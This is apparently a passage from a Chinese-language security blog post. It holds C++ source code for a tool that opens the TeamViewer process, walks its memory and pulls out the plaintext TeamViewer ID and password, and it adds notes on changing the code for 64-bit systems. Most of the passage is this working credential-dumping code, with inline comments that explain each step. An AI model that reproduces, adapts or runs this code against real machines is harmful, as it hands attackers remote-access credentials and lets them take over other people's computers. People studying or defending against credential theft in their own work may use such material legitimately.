<span class=hljs-meta>#<span class=hljs-meta-keyword>if</span> _WIN64</span>
_int64 EndAddress = <span class=hljs-number>0x0007FFFFFFFF0000</span>;
<span class=hljs-meta>#<span class=hljs-meta-keyword>else</span></span>
<span class=hljs-keyword>int</span> EndAddress = <span class=hljs-number>0X7FFF0000</span>;
<span class=hljs-meta>#<span class=hljs-meta-keyword>endif</span> <span class=hljs-comment>//根据位数不同遍历的地址大小不同</span></span>
<span class=hljs-keyword>using</span> <span class=hljs-keyword>namespace</span> std;
<span class=hljs-keyword>typedef</span> <span class=hljs-class><span class=hljs-keyword>enum</span> _<span class=hljs-title>MEMORY_INFORMATION_CLASS</span> {</span>
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
<span class=hljs-function><span class=hljs-keyword>typedef</span> <span class=hljs-title>NTSTATUS</span><span class=hljs-params>(WINAPI* fnZwQueryVirtualMemory)</span> <span class=hljs-params>(
HANDLE ProcessHandle,
PVOID BaseAddress,
MEMORY_INFORMATION_CLASS MemoryInformationClass,
PVOID MemoryInformation,
SIZE_T MemoryInformationLength,
PSIZE_T ReturnLength
)</span></span>;
<span class=hljs-function><span class=hljs-keyword>int</span> <span class=hljs-title>GetPidByName</span><span class=hljs-params>(PCWCHAR procName)</span> </span>{
HANDLE ProcessId = <span class=hljs-built_in>CreateToolhelp32Snapshot</span>(TH32CS_SNAPPROCESS, <span class=hljs-literal>NULL</span>);
<span class=hljs-keyword>if</span> (ProcessId == <span class=hljs-literal>NULL</span>) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"Fail"</span>);
}
PROCESSENTRY32 te32 = { <span class=hljs-number>0</span> };
te32.dwSize = <span class=hljs-built_in><span class=hljs-keyword>sizeof</span></span>(te32);
<span class=hljs-keyword>int</span> number = <span class=hljs-number>0</span>;
<span class=hljs-keyword>if</span> (<span class=hljs-built_in>Process32First</span>(ProcessId, &amp;te32)) {
<span class=hljs-keyword>do</span> {
<span class=hljs-keyword>if</span> (!<span class=hljs-built_in>lstrcmp</span>(te32.szExeFile, procName)) {
<span class=hljs-comment>//printf("[+] TeamViewer PID: %d", te32.th32ProcessID);</span>
<span class=hljs-keyword>return</span> te32.th32ProcessID;
}
} <span class=hljs-keyword>while</span> (<span class=hljs-built_in>Process32Next</span>(ProcessId, &amp;te32));
}
} <span class=hljs-comment>//用进程名得到PID</span>
<span class=hljs-function><span class=hljs-keyword>int</span> <span class=hljs-title>main</span><span class=hljs-params>()</span> </span>{
MEMORY_BASIC_INFORMATION mbi = { <span class=hljs-number>0</span> }; <span class=hljs-comment>//初始化MEMORY_BASIC_INFORMATION结构</span>
fnZwQueryVirtualMemory ZwQueryVirtualMemory = (fnZwQueryVirtualMemory)<span class=hljs-built_in>GetProcAddress</span>(<span class=hljs-built_in>GetModuleHandleA</span>(<span class=hljs-string>"ntdll.dll"</span>), <span class=hljs-string>"ZwQueryVirtualMemory"</span>);
<span class=hljs-comment>//ndtll.dll得到ZwQueryVirtualMemory</span>
<span class=hljs-keyword>if</span> (ZwQueryVirtualMemory == <span class=hljs-literal>NULL</span>) {
<span class=hljs-keyword>if</span> (ZwQueryVirtualMemory == <span class=hljs-literal>NULL</span>)
{
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"没有找到ZwQueryVirtualMemory函数"</span>);
<span class=hljs-built_in>system</span>(<span class=hljs-string>"pause"</span>);
<span class=hljs-keyword>return</span> <span class=hljs-number>0</span>;
}
}
<span class=hljs-comment>//如果为NULL就是没找到</span>
DWORD cbNeeded; <span class=hljs-comment>//EnumProcessModules参数</span>
HMODULE pModuleIds[<span class=hljs-number>1024</span>]; <span class=hljs-comment>//EnumProcessModules存放模块的数组</span>
HANDLE hProcess = <span class=hljs-built_in>OpenProcess</span>(PROCESS_ALL_ACCESS, <span class=hljs-number>0</span>, <span class=hljs-built_in>GetPidByName</span>(<span class=hljs-string>L"TeamViewer.exe"</span>));
<span class=hljs-comment>//TeamViewer.exe进程句柄</span>
<span class=hljs-built_in>EnumProcessModules</span>(hProcess, pModuleIds, <span class=hljs-built_in><span class=hljs-keyword>sizeof</span></span>(pModuleIds), &amp;cbNeeded);
<span class=hljs-keyword>int</span> StartAddress = (<span class=hljs-keyword>int</span>)pModuleIds[<span class=hljs-number>0</span>];
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]PEBaseAddress: %p\n"</span>, StartAddress); <span class=hljs-comment>//找到TeamViewer.exe基地址</span>
<span class=hljs-keyword>do</span> {
<span class=hljs-built_in>ZwQueryVirtualMemory</span>(hProcess, (LPVOID)StartAddress, MemoryBasicInformation, &amp;mbi, <span class=hljs-built_in><span class=hljs-keyword>sizeof</span></span>(mbi), <span class=hljs-literal>NULL</span>); <span class=hljs-comment>//从基地址开始遍历将内存信息存放MEMORY_BASIC_INFORMATION结构</span>
<span class=hljs-keyword>if</span> (mbi.RegionSize == <span class=hljs-number>0x1FF000</span>) { <span class=hljs-comment>//查看内存大小是否为1FF000</span>
<span class=hljs-keyword>int</span> id_temp = <span class=hljs-number>0</span>; <span class=hljs-comment>//临时变量找到了就改为1避免重复读取</span>
<span class=hljs-keyword>char</span> password_temp = <span class=hljs-number>0</span>; <span class=hljs-comment>//同上</span>
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]BaseAddress: %p\n"</span>, mbi.BaseAddress); <span class=hljs-comment>//模块基地址</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> i = <span class=hljs-number>0</span>; i &lt; <span class=hljs-number>0x1FF000</span>; i++) {
<span class=hljs-keyword>char</span> id[<span class=hljs-number>0x17</span>]; <span class=hljs-comment>//存放id的char数组因为是unicode字符所以要双倍大小加上前面的0x80和后面的0x000x00</span>
<span class=hljs-keyword>char</span> id_char[<span class=hljs-number>0xA</span>] = {<span class=hljs-number>0</span>}; <span class=hljs-comment>//unicode转换为ASCII存放的数组</span>
<span class=hljs-keyword>char</span> password[<span class=hljs-number>0x15</span>]; <span class=hljs-comment>//存放密码的unicode数组加上前面的0x88和后面的0x000x00</span>
<span class=hljs-keyword>char</span> password_char[<span class=hljs-number>0x9</span>] = {<span class=hljs-number>0</span>}; <span class=hljs-comment>//同上</span>
<span class=hljs-built_in>ReadProcessMemory</span>(hProcess, (LPVOID)((<span class=hljs-keyword>int</span>)mbi.BaseAddress + i), password, <span class=hljs-number>0x15</span>, <span class=hljs-literal>NULL</span>);
<span class=hljs-built_in>ReadProcessMemory</span>(hProcess, (LPVOID)((<span class=hljs-keyword>int</span>)mbi.BaseAddress + i), id, <span class=hljs-number>0x17</span>, <span class=hljs-literal>NULL</span>);
<span class=hljs-comment>//内存中读出数据</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> x = <span class=hljs-number>0</span>; x &lt;= <span class=hljs-number>0x8</span>; x++) {
password_char[x] = password[ x * <span class=hljs-number>2</span> + <span class=hljs-number>2</span> ];
}
<span class=hljs-comment>//将0x00去除写入password_char数组</span>
password_char[<span class=hljs-number>8</span>] = <span class=hljs-string>'\x00'</span>; <span class=hljs-comment>//最后加上\x00结尾</span>
<span class=hljs-keyword>if</span> (password[<span class=hljs-number>1</span>] == <span class=hljs-number>0xffffff88</span> &amp;&amp; password[<span class=hljs-number>17</span>] == <span class=hljs-number>0</span> &amp;&amp; password[<span class=hljs-number>18</span>] == <span class=hljs-number>0</span> &amp;&amp; <span class=hljs-built_in>regex_match</span>(password_char, <span class=hljs-built_in>regex</span>(<span class=hljs-string>"[0-9a-z]{8}"</span>))) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]password: %s\n"</span>, password_char);
password_temp = <span class=hljs-number>1</span>;
}
<span class=hljs-comment>//判断password[1]是否为0x8817,18位是否为00最后正则匹配password_char</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> x = <span class=hljs-number>0</span>; x &lt;= <span class=hljs-number>0x9</span>; x++) {
id_char[x] = password[x * <span class=hljs-number>2</span> + <span class=hljs-number>2</span>];
}
<span class=hljs-comment>//同上</span>
id_char[<span class=hljs-number>9</span>] = <span class=hljs-string>'\x00'</span>;
<span class=hljs-keyword>if</span> (id_temp == <span class=hljs-number>0</span> &amp;&amp; id[<span class=hljs-number>1</span>] == <span class=hljs-number>0xffffff80</span> &amp;&amp; id[<span class=hljs-number>19</span>] == <span class=hljs-number>0</span> &amp;&amp; id[<span class=hljs-number>20</span>] == <span class=hljs-number>0</span> &amp;&amp; <span class=hljs-built_in>regex_match</span>(id_char, <span class=hljs-built_in>regex</span>(<span class=hljs-string>"[0-9]{9}"</span>))) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]id: %s\n"</span>, id_char);
id_temp = <span class=hljs-number>1</span>;
}
<span class=hljs-comment>//这里和上面差不多id_temp == 0 是因为ID会出现多个相同的值所以只要取到一次就不用再取了</span>
<span class=hljs-keyword>if</span> (id_temp == <span class=hljs-number>1</span> &amp;&amp; password_temp == <span class=hljs-number>1</span>) {
<span class=hljs-keyword>break</span>;
}
<span class=hljs-comment>//如果id_temp和password_temp都为1说明已经都取到了就可以跳出循环了</span>
}
<span class=hljs-keyword>break</span>;
}
StartAddress += mbi.RegionSize; <span class=hljs-comment>//不是就加上当前内存块大小继续遍历</span>
} <span class=hljs-keyword>while</span> (StartAddress &lt;= EndAddress);
}
</code></pre>
<p blockindex=41><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABcsAAAMTCAYAAAB+KU+uAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzde2ATZb4//vdMkjZNCwVKyj1ALxjEteyi0BYU0FUo61n4nQXF3fMVcPcgoOfokZXLHvipP/wp4OKB39cDyHdXZb9njyj6FY7KzRv3m7orimwPtEUjFyHcCm2aNpl5fn9MZpo0SZu06f392o00k2eeeeaZSyafPPmMtPc3c4QQKqACKgSE0P6tkmVUyhKqJQmKJEEAEIgs8nRtqhAAJG2KFPyyFPRMiMjTI70eSaR5QmZvYP46dem1CSFq5w2eXrdNdZYvN7A4IYX2mYza5xIASZZDliWECFlG8NKEJEFVVUiyZJQRQkCSJJglGSZZhqIo8Pv9kCxmyMkWVNR4cfH6VZisyeg7OBv2/oMgJadAmGRAluBXFJhkE4TfD5MkG4tWJW15ItAKKfBfSdL6SagCJklGtdcLn88Hq9UKk9kEVe8/qXY+CAFJ1K6bCO9GBHV9yPOIpEC/NLAvRJw1aJ649hVj0aENFbVTDIpfgcVsAgSgKn4IocBktqDqxg0o/mqYAFxyX8LJk/+NvB/dipSUFAhVQFH9MJlMEBICO06g90VQf0jaS4EVqF22Xlaq3cP010L3v+B9WYaxMQLro6oCsiRp/SRqa5AkCbJJhpAEFEXRnssyJEmCyWQCAPh8PlRcv46K8nLcuHYNanUNrLIJVosZSbIJZmhlJSEAVUASKmQJMKHO+UKWofhVbd80WZCUlARVFfB6q2FOTtaaLNRA+9TAFpBr+0c7aCGEFLIjSRCQIEFAQPt/0N4taf+q0c58ktaRQlX1vTqwiYQ2ryRDlvU+VAFI2nMBKIoCqAJCBiSzCYoQUFXVOI5UVYHiV6AqCnw+P2RJm9ckmyDL2nFtMpkgSYHWi6AztNDPG9p/TLKpdroQgKoCkqRtU1mGZJK17WY2QZJNgCxrfSZLEBJgks2B3UlAhnYcS5CMhUgmGRAqVFUBICDLEnyqAhUS5ORk+CFBMltgtqbAmpoGk8UCSFqb/NVe3Lh2BULxAX4Fkk+BpKqwSDJMJgmqKgBJBPZvSftfYDVlNbBaxuv6rlnn+NPPn6oC2WSCUBUIocJsMqG6uhpVHi9kSxIy+vaBMJvhUwXM5mT4q31IsiajRlWAZAtMqVaYUpK1vcavQPYH6q+phqr4ofgVCL/2XirUwL9CQCgqTLK2raCqgX1bgur3we/zQQ2eB4CsH3uB9x9ZliFU/RyDkPO8tjGEsZ/KJhlmswUqROC5CarQ/jWbzYFzrTDez4QkQYX2ni8L/ZgTUFWtT2VZBlRtm0oCkEwSJJMJfqhQZAmmZAtMgXolSQJ8ftRUVEGp9EKu8UPyq4AqoKgK/IoKRaiQAJhkGebA8aFKCBxjkvGQIQXOBSo8lTdwo+I6rFYrUrt2hcligSLJ8AsZpuRk2LqmQZUEBLS+VoWAFDiOJFVA9fshSzJkSYKqqBBC1Q8H7SEHd60EWdLef/X3f0mWoOrnD1VbjiS0spKkvSbLMiAEVKjaORHa8WNKMsGclKTVrgJKjQ81lV4onhrIivZ+ieD9V38vkiRt++oPSet//TylN1iStO0BkwTIsnFtIQW2pSRgXBvo62OCBEkVUKqq4fVUwRQ4Z8uydh5QVVU7PwX6o6HrLxVBywqeLgEKBFQJMFuTkWJLgSzL8FXXQFUUyJC085xQIMmAybhG0OpUJQmqJMGcnAyrNRkQAr7qGvirvIDfB9VXg/Jr1yAA9OzVG6oqYE5KRrVfgTnZimRrMqSkJPhraqCoKlRFBVRVa6cqtIUIAQmB83PwOVTrXMgmOei9MHCODtoHAgesduwG1l8/foVAYL/Uto1sNsFsMkGWAvuKX+tnxe/T+j9wXoAqIIQKIQLXhoFl69fS+nuT/n5lvH8FdmoROIwkWYZsMsGSZIEIrKPiVyAUBZIqAtdugBo4HmpJIdtRP1aCt25wCVUISCYTTGYTJACKqmj7T+D9Qq9AEtp+rl8HikCr9feS2mttbb8zySbIJu36VajCOD/WtidQXKiB85neJrm2P/SWy1rFaqBfJUmCJJsgSxL8fr92nKuB6wGhAnqfSIGa9OuvkH4IvW6UZe18IFQFsqRtwxpfNSoqbkAVKjJ7ZmrnEVWC6hfQrnK093pJhrEd9etifXGqKoIua/XrbhjHpXbNEDiD6uf14NdRe24LvpgWgWtFYZIhTDKsXdKQ3K0r/L4a7TjzVgN+FUmySSuvqoFref2dOFBV7SYO7R1jQtC+oh0gkMwmmC0WyGYTTBYzFJ8ffp8fqqptawTe9/RrHNW4ltXOR/q1kbZPBF3wCOOqL6QNou4OHSLQDxBQhdDO22YzklOsMCcnwe/zocbv045HSTvW5cB1iKooUH3+QJvVkH6RAv+t/UwRvD0ko6P07a6qAmaTCQIKhOoHoKLKUwmTJMEkmQOdJ8EkmyGgQhWq1keSCVXeKiSnpuHajeuo8vnQM7MXkq1JkE0mKIoPZpMM2SRDhQoFAkKSoEBAUVV4vNVQZBn2gf2Q3KMb1EDTJJ+A69g3wPVK2GQL0pKSoSh+iMB1hqr4A9tDXzt9/9KuqoN7VzL+Umvf5QPFFcWv1acKeGuq4amqgmKWkTnQgbQ+vYBuXQCzDD8AswTgRg0qzl7A+W9OIU2SkSSZa8+dkn4MI3CtKhl9blwnBhauHysIKhP8War2I5d2rJiTtfOoV/UjOcWK1K5pgNkEEfiMW7u7176P6Qeffr0Q/A6jn6PkkAiAQO25S6tENpmh+H3asaAokKGiutKDK5cuwixLSLGmwFvlQarNBq+3CmazWTtmVKGf+KDql4qSDEmoWswgcH2nX+vV+cRVu7+K2nO2/rmv9qyiq2deufYYiPT5Wg68V+qfYQS09y5T4LOJFLgukWTtvG68DxrnMuOMB6A2zhDtuiX4877exmivBbc50muRRFpHYz+s85okGWfzqLTP1kHnXP2zQaDxUtD1q/H5UfFD8fsD17sicE3nh6Jf/+r9JwUdI4HzmRJcFvrnVu1cbDKbIAc+yxjXx4Hzrt5G2biIq42f6e9Neiwj+H1Y1q8xRZ3+CTo/AtHP4Q1tH6nu5qhbLGzfD/5b6zvtfUiLZ1gsFihCRU1NDVK6dsGlihs4476I4aPyYe/XH0i2Qg18jvYpKsyBeF7I0S8FH+USpKB3rfD9s/7r74ZE3udqybIc8jze5TWlvUFn3qBnQe8dEiAU7X1OQNU+N0jQ3i/8ftTUVKOqsgI2qxVKjQ/+6mokm82AqqC6ohLw+3Dmu+9w+fwF2JKT0cWWimSTGSlJSfDXaO/p+rVUkl+BTVFgU1QtdhN4f9BjX9Lu3zwiEPiAKQDUQMKVJDOUlBSk2O3oMnAAuvTtg+T09Lg6kIiIYhPPG0xj3zzrmy/4taa+OVP82OdERERERERE0cX6BVZ9vNev4/qZM7j2/RlU/vAD5CovunurkRz0BZBJlmFWVO2bIUUIVJjNKE8yo0vWIAwcPz4Bq0JERPVp7kB5yC9kmlhXIucnIiIiIiIiIopFImIQyV26wD50KOxDhwIASj/+BO6y00jzViNN8cMc+PWUWRLaT8+um2RUpNqQNeEe2HplNrkBRERUv+YMlMcbJGfwm4iaG88zRERERImXiBG3RJ1R9t13ofKWCzi1cydQXoFUvx9JsoBZhUA1gPIkCwbeMZqBciKiFhBr0Cje4JKq1s1BywA5JQb3F+oMuJ8TERG1X501aMzrF2qqznrsAEBqr15w3HEHTn/0CSw3/ICqwqwKgStJFqRnDUb64EGt3UYiog6vpQLlzZF+pTm15bZR+8B9iKjt4PFIRBSbzhykSjS+91Bb1B6O8c5+7HQfNAhXsgbj2slTsHtrYPbIMpSUFDjGj4t4kzchBBRFgd/vR01NDWRZhsPhQGZmJrp06dJa60FEZLh+/TrcbjdOnz4NRVFgNpuRlJQEs9kcuJO19uZU902qNd60miNQHinlSkPPm7rMzo
<h2 blockindex=42>0x05 代码实现 x64</h2>
<p blockindex=43>64位中线程的内存地址都比进程基址小了就是存有ID密码的内存都到进程上面了</p>
<p blockindex=44><img src="data:image/png;base64,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
<p blockindex=45>都是7FFE0000开始这样就不用先得到进程基址可以直接遍历</p>
<p blockindex=46>还有在64位中密码开头的数字变成了0x90这也是需要改下的别的基本都是相同的</p>
<p blockindex=47><img src="data:image/png;base64,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